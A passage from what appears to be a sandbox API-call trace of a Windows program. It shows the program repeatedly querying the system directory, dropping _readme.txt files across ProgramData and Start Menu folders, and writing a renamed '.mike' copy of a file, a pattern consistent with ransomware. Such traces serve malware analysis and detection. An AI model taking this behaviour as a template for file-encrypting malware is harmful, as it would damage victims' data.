out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.868] CoTaskMemFree (pv=0x508980) [0155.868] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.868] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.869] CoTaskMemFree (pv=0x508980) [0155.869] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.869] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.869] CoTaskMemFree (pv=0x508980) [0155.870] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.870] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.870] CoTaskMemFree (pv=0x508980) [0155.871] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.871] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.871] CoTaskMemFree (pv=0x508980) [0155.871] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.871] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.872] CoTaskMemFree (pv=0x508980) [0155.872] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.872] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.872] CoTaskMemFree (pv=0x508980) [0155.873] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.873] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.873] CoTaskMemFree (pv=0x508980) [0155.874] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.874] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.874] CoTaskMemFree (pv=0x508980) [0155.874] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.874] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.875] CoTaskMemFree (pv=0x508980) [0155.875] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.875] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.875] CoTaskMemFree (pv=0x508980) [0155.876] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.876] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.876] CoTaskMemFree (pv=0x508980) [0155.877] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.877] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.877] CoTaskMemFree (pv=0x508980) [0155.877] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.878] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.878] CoTaskMemFree (pv=0x508980) [0155.878] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.878] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.879] CoTaskMemFree (pv=0x508980) [0155.879] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.879] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.879] CoTaskMemFree (pv=0x508980) [0155.883] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.883] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.884] CoTaskMemFree (pv=0x508980) [0155.888] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.888] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.888] CoTaskMemFree (pv=0x508980) [0155.888] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.889] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.889] CoTaskMemFree (pv=0x508980) [0155.889] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.889] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.890] CoTaskMemFree (pv=0x508980) [0155.890] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.890] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.890] CoTaskMemFree (pv=0x508980) [0155.891] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.891] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.891] CoTaskMemFree (pv=0x508980) [0155.891] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.901] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\_readme.txt", dwFileAttributes=0x80) returned 1 [0155.904] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.904] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.904] CoTaskMemFree (pv=0x508980) [0155.905] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.910] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\_readme.txt", dwFileAttributes=0x80) returned 1 [0155.914] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.914] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.914] CoTaskMemFree (pv=0x508980) [0155.915] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.915] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.915] CoTaskMemFree (pv=0x508980) [0155.915] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.915] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.916] CoTaskMemFree (pv=0x508980) [0155.918] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.918] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.918] CoTaskMemFree (pv=0x508980) [0155.918] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.919] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.919] CoTaskMemFree (pv=0x508980) [0155.919] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.919] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.920] CoTaskMemFree (pv=0x508980) [0155.920] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.920] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.920] CoTaskMemFree (pv=0x508980) [0155.921] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.921] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.921] CoTaskMemFree (pv=0x508980) [0155.922] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.922] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.922] CoTaskMemFree (pv=0x508980) [0155.922] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.922] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.923] CoTaskMemFree (pv=0x508980) [0155.923] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.923] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.923] CoTaskMemFree (pv=0x508980) [0155.924] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.924] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.924] CoTaskMemFree (pv=0x508980) [0155.928] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.928] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.928] CoTaskMemFree (pv=0x508980) [0155.929] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.929] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.929] CoTaskMemFree (pv=0x508980) [0155.929] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.929] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.930] CoTaskMemFree (pv=0x508980) [0155.930] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.930] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.930] CoTaskMemFree (pv=0x508980) [0155.931] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.931] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.931] CoTaskMemFree (pv=0x508980) [0155.935] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.935] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.936] CoTaskMemFree (pv=0x508980) [0155.936] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.936] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.936] CoTaskMemFree (pv=0x508980) [0155.937] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.937] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.937] CoTaskMemFree (pv=0x508980) [0155.938] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.938] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.938] CoTaskMemFree (pv=0x508980) [0155.938] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0155.939] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0155.939] CoTaskMemFree (pv=0x508980) [0155.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.946] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\cversions.2.db", dwFileAttributes=0x80) returned 1 [0155.948] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.953] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\_readme.txt", dwFileAttributes=0x80) returned 1 [0155.956] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.961] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db", dwFileAttributes=0x80) returned 1 [0155.964] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.978] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db", dwFileAttributes=0x80) returned 1 [0155.981] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0155.986] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db", dwFileAttributes=0x80) returned 1 [0155.989] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0156.009] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", dwFileAttributes=0x80) returned 1 [0156.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0156.047] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", dwFileAttributes=0x80) returned 1 [0156.051] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.051] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.052] CoTaskMemFree (pv=0x508980) [0156.052] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.052] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.053] CoTaskMemFree (pv=0x508980) [0156.053] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.053] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.053] CoTaskMemFree (pv=0x508980) [0156.054] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.054] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.054] CoTaskMemFree (pv=0x508980) [0156.055] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.055] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.055] CoTaskMemFree (pv=0x508980) [0156.056] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.056] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.056] CoTaskMemFree (pv=0x508980) [0156.056] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0156.062] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.064] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.064] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.064] CoTaskMemFree (pv=0x508980) [0156.068] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.068] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.068] CoTaskMemFree (pv=0x508980) [0156.069] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.069] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.069] CoTaskMemFree (pv=0x508980) [0156.070] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.070] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.070] CoTaskMemFree (pv=0x508980) [0156.070] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.070] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.071] CoTaskMemFree (pv=0x508980) [0156.071] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.071] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.071] CoTaskMemFree (pv=0x508980) [0156.072] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0156.082] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.086] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.086] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.086] CoTaskMemFree (pv=0x508980) [0156.087] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0156.093] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.097] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.097] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.097] CoTaskMemFree (pv=0x508980) [0156.098] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.106] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.109] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.110] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.110] CoTaskMemFree (pv=0x508980) [0156.110] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0156.117] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.120] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.120] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.120] CoTaskMemFree (pv=0x508980) [0156.121] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0156.129] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.132] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.132] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.132] CoTaskMemFree (pv=0x508980) [0156.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0156.139] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.225] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.225] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.225] CoTaskMemFree (pv=0x508980) [0156.226] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0156.232] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.236] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.236] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.236] CoTaskMemFree (pv=0x508980) [0156.237] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.244] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.247] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.247] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.247] CoTaskMemFree (pv=0x508980) [0156.248] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8e194aab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8e194aab, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x208, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.250] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.251] WriteFile (in: hFile=0x1c8, lpBuffer=0x20fef5c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x20fef5c*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0156.253] CloseHandle (hObject=0x1c8) returned 1 [0156.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0156.253] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x20fea50 | out: lpFileInformation=0x20fea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c71a080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c71a080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c71a080, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0156.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0156.254] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.254] GetFileType (hFile=0x1c8) returned 0x1 [0156.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0156.254] GetFileType (hFile=0x1c8) returned 0x1 [0156.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.256] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.256] GetFileType (hFile=0x1c8) returned 0x1 [0156.256] SetThreadErrorMode (dwNewMode=0x0, 